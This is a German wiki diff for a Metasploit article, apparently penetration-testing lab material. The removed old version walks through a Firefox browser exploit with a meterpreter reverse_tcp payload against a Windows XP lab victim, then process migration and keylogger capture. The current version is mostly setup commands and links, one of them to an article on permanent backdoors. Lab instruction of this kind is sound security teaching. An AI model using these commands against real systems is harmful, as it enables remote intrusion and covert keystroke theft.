Metasploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(95 dazwischenliegende Versionen von 7 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
 +
=Fundamental=
 +
*[[Grundlegendes]]
 +
*[https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/ Aufbau]
  
=Links=
+
=preparation=
*http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
+
==Postgresql enable and start==
*http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
+
*systemctl start postgresql
*https://jonathansblog.co.uk/metasploit-tutorial-for-beginners
+
*systemctl enable postgresql
*https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
 
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
 
*http://www.metasploit.com/
 
=Setup Opfer=
 
Winxp Service pack 3
 
Firefox 3.5
 
  
=Setup Hacker=
+
==Init Metasploit first time==
Kali Linux
+
*msfdb init
ip: 192.168.242.53
 
  
=vorgehen=
+
==Apache enablen und start==
starte metasploit
+
*systemctl start apache2
msfconsole
+
*systemctl enable  apache2
 +
=Einstieg=
 +
*[[metasploit Datenbank]]
 +
*[[metasploit Datenbank Handling]]
 +
*[[metasploit Übersicht]]
 +
*[[msfvenom]]
  
use exploit/multi/browser/firefox_escape_retval
+
= Beispiele =
set payload windows/meterpreter/reverse_tcp/
+
* [[Metasploit handling]]
set lhost 192.168.242.53 (lokaler Host)
+
* [[Metasploit trojaner windows]]
set svrhost 192.168.242.53 (HTTP-Server IP)
+
* [[Metasploit trojaner linux]]
set svrport 8888 (HTTP-Server Port)
+
* [[Metasploit script]]
set lport 4444 (lokaler Port)
+
* [[Armitage]]
set uripath /hack (optional)
+
* [[Metasploit Portscanning]]
exploit
+
* [[Metasploit Schnellstart]]
  
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
+
* [[Metasploit dir_scanner]]
wenn wir meterpreter > sehen hat der exploit funktioniert
+
* [[Metasploit trojaner android]]
 +
* [[Metasploit trojaner android fatrat]]
 +
* [[Metasploit browser Exlpoit]]
 +
* [[Metasploit VSFTP 2.3.4]]
  
session - i 1 (in die session gehen)
+
=Weitere Beispiele=
sessions -h (zeigt optionen)
 
ps (zeigt prozesse)
 
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
 
getpid (zeigt momentanen prozess)
 
keyscan_start (startet den keyloger)
 
keyscan_dump (zeigt aufzeichnungen)
 
keyscan_stop (stopt keyloger)
 
  
 +
*[[Metasploit Basis Aufgaben]]
 +
*[[Metasploit win2k8 Aufgaben]]
  
 +
*[[metasploit weitere Beispiele]]
  
Download Adobe Flash Player 18.0.0.203 (for Internet Explorer)
+
=misc=
http://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ax.exe
+
*[[metasploit-exploitdb]]
 +
*[[metasploit-todo]]
 +
*[[Metasploit als Pivot Host]]
  
Download Adobe Flash Player 18.0.0.203 (for Firefox and other browsers NPAPI )
+
=Links=
http://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player.exe
+
*[https://jonathansblog.co.uk/metasploit-tutorial-for-beginners Metasploit for beginners]
 
+
*https://github.com/rapid7/metasploit-framework/
Download Adobe Flash Player 18.0.0.203 (forChromium /Opera PPAPI)
+
*https://netsec.ws/?p=331
http://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ppapi.exe
+
*http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
 
+
*http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
View: Adobe Flash Player Website | Release Notes
+
*https://jonathansblog.co.uk/metasploit-tutorial-for-beginners
 
+
*https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
Click here to check your version and Here to Download and here is an Alternate Download make sure you uncheck any unwanted add-ons and download both the one for IE and the other for other Browsers such as Firefox, Safari, Opera plugins!
+
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
 +
*http://www.metasploit.com/
 +
*http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/

Aktuelle Version vom 22. Mai 2025, 09:33 Uhr

Fundamental

preparation

Postgresql enable and start

  • systemctl start postgresql
  • systemctl enable postgresql

Init Metasploit first time

  • msfdb init

Apache enablen und start

  • systemctl start apache2
  • systemctl enable apache2

Einstieg

Beispiele

Weitere Beispiele

misc

Links